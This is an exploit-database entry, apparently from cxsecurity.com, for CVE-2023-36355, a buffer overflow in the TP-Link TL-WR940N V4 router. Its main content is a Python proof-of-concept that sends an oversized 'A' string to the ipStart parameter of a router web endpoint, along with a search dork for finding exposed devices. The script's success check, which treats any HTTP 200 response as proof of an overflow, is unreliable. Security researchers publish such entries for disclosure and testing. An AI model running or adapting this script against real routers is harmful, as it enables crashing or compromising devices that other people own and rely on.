TP-Link TL-WR940N 4 Buffer Overflow

2023.07.05
Risk: High
Local: No
Remote: Yes
CWE: CWE-119

# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow # Date: 2023-06-30 # country: Iran # Exploit Author: Amirhossein Bahramizadeh # Category : hardware # Dork : /userRpm/WanDynamicIpV6CfgRpm # Tested on: Windows/Linux # CVE : CVE-2023-36355 import requests # Replace the IP address with the router's IP router_ip = '192.168.0.1' # Construct the URL with the vulnerable endpoint and parameter url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart=' # Replace the payload with a crafted payload that triggers the buffer overflow payload = 'A' * 5000 # Example payload, adjust the length as needed # Send the GET request with the crafted payload response = requests.get(url + payload) # Check the response status code if response.status_code == 200: print('Buffer overflow triggered successfully') else: print('Buffer overflow not triggered')


Vote for this issue:
100%
0%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top